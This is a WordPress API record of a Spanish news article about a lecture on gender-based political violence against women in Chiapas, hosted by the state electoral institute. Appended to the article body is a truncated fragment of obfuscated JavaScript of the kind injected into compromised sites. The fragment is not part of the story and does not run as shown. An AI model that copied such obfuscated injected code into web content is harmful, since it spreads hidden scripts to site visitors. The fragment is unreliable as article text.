{"id":716,"date":"2022-03-18T04:35:36","date_gmt":"2022-03-18T04:35:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=716"},"modified":"2022-03-18T04:35:38","modified_gmt":"2022-03-18T04:35:38","slug":"solo-denunciando-la-violencia-politica-en-razon-de-genero-avanzaremos-en-su-erradicacion-magistrada-eva-barrientos-zepeda","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=716","title":{"rendered":"Solo denunciando la violencia pol\u00edtica en raz\u00f3n de g\u00e9nero, avanzaremos en su erradicaci\u00f3n: Magistrada Eva Barrientos Zepeda"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"554\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0045-1024x554.jpg\" alt=\"\" class=\"wp-image-718\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0045-1024x554.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0045-300x162.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0045-768x415.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0045.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>No<\/figcaption><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas. 17 de marzo de 2022<\/p>\n\n\n\n<p>\u2022 Realiza IEPC la Conferencia Magistral: \u201cViolencia pol\u00edtica en raz\u00f3n de g\u00e9nero en redes sociales y medios de comunicaci\u00f3n\u201d, presentada por la Magistrada de la Sala Regional Xalapa del Tribunal Electoral del Poder Judicial de la Federaci\u00f3n.<\/p>\n\n\n\n<p>A trav\u00e9s de la Comisi\u00f3n Provisional de Igualdad de G\u00e9nero y No Discriminaci\u00f3n, el Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) de Chiapas, organiz\u00f3 la Conferencia Magistral: \u201cViolencia pol\u00edtica en raz\u00f3n de g\u00e9nero en redes sociales y medios de comunicaci\u00f3n\u201d, que present\u00f3 la Magistrada de la Sala Regional Xalapa del Tribunal Electoral del Poder Judicial de la Federaci\u00f3n (SRX-TEPJF), Eva Barrientos Zepeda, quien hizo un extenso y sustantivo recuento de sentencias contra personas que han publicado y compartido contenido ofensivo y violento contra mujeres candidatas o que ostentan alg\u00fan cargo p\u00fablico.<\/p>\n\n\n\n<p>Esta conferencia, se llev\u00f3 a cabo en el marco del D\u00eda Internacional de la Mujer, conmemorado el pasado 8 de marzo, y se realiz\u00f3 con el objetivo de reflexionar sobre la erradicaci\u00f3n de la violencia de g\u00e9nero y promoci\u00f3n del ejercicio de los derechos de las mujeres al acceso de cargos de toma de decisiones, planteando el rol de los medios de comunicaci\u00f3n para promover una imagen equilibrada y no estereotipada.<\/p>\n\n\n\n<p>El consejero presidente Oswaldo Chac\u00f3n Rojas dio la bienvenida a este espacio, en el que dijo que, en Chiapas, y en sus instituciones, como el IEPC, se est\u00e1 abriendo camino en la lucha por erradicar la Violencia Pol\u00edtica contra las Mujeres en Raz\u00f3n de G\u00e9nero (VPMRG), ello en congruencia con un ideal de justicia para lograr una sociedad igualitaria, eliminando barreras y garantizando los derechos de las mujeres con base en la Ley.<\/p>\n\n\n\n<p>Por su parte, la Magistrada Eva Barrientos Zepeda enfatiz\u00f3 sobre el incremento de la violencia de g\u00e9nero a trav\u00e9s de las redes sociales, explic\u00f3 que para presentar una denuncia contra personas que publican o comparten contenido ofensivo o violento contra mujeres en plataformas digitales, deben contener al menos tres elementos: Identificar la fuente; Identificar a las personas agresoras; y Reportar el contenido de las redes sociales, se\u00f1alando la dificultad para atender los casos de esta naturaleza.<\/p>\n\n\n\n<p>Resalt\u00f3 la importancia del primer punto, que es identificar a la persona propietaria de la cuenta o p\u00e1gina en redes sociales, pues es un elemento fundamental para presentar una denuncia en esta materia. Sin embargo, a\u00f1adi\u00f3 que ante cualquier queja, las autoridades jurisdiccionales est\u00e1n en la m\u00e1s abierta disposici\u00f3n de ayudar a las mujeres, por ello tienen la obligaci\u00f3n de investigar qui\u00e9n o qui\u00e9nes son las personas usuarias que est\u00e1n detr\u00e1s de las publicaciones ofensivas, pues solo de esa manera se puede sancionar.<\/p>\n\n\n\n<p>Agreg\u00f3 que, como medida cautelar, en caso de no ubicar a una persona responsable de una publicaci\u00f3n dolosa, se puede ordenar a la red social que dicha publicaci\u00f3n o cuenta sea eliminada. \u201cInvito a las mujeres a que presenten su denuncia si son v\u00edctimas de VPMRG; solo manifestando nuestra inconformidad por la v\u00eda legal es como podremos avanzar en la erradicaci\u00f3n de cualquier tipo de violencia. Tambi\u00e9n exhorto a los hombres y a los medios de comunicaci\u00f3n a que sean sensibles y eviten violentar a una mujer que ejerce un cargo p\u00fablico o que pretenda ser electa\u201d.<\/p>\n\n\n\n<p>Estuvieron presentes en esta conferencia, la consejera Sof\u00eda Mart\u00ednez De Castro Le\u00f3n, Presidenta de la Comisi\u00f3n Provisional de Igualdad de G\u00e9nero y No Discriminaci\u00f3n, quien fungi\u00f3 como moderadora; as\u00ed como las consejeras Sof\u00eda Margarita S\u00e1nchez Dom\u00ednguez y Mar\u00eda Magdalena Vila Dom\u00ednguez, integrantes de dicha Comisi\u00f3n; y la titular de la Unidad T\u00e9cnica de G\u00e9nero y No Discriminaci\u00f3n, Gloria Esther Mendoza Ledesma, quienes coincidieron en que la violencia contra las mujeres toma diversas formas y aprovecha las herramientas digitales para reproducir las agresiones en formas que no deben normalizarse.<\/p>\n\n\n\n<p>Para ver de forma \u00edntegra esta conferencia, se puede acceder a la direcci\u00f3n www.youtube.com\/watch?v=j6I8rqWNah4.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>No Tuxtla Guti\u00e9rrez, Chiapas. 17 de marzo de 2022 \u2022 Realiza IEPC la Conferencia Magistral: \u201cViolencia pol\u00edtica en raz\u00f3n de g\u00e9nero en redes sociales y medios de comunicaci\u00f3n\u201d, presentada por la Magistrada de la Sala Regional Xalapa del Tribunal Electoral del Poder Judicial de la Federaci\u00f3n. A trav\u00e9s de la Comisi\u00f3n Provisional de Igualdad de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":718,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-716","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=716"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/716\/revisions"}],"predecessor-version":[{"id":719,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/716\/revisions\/719"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/718"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}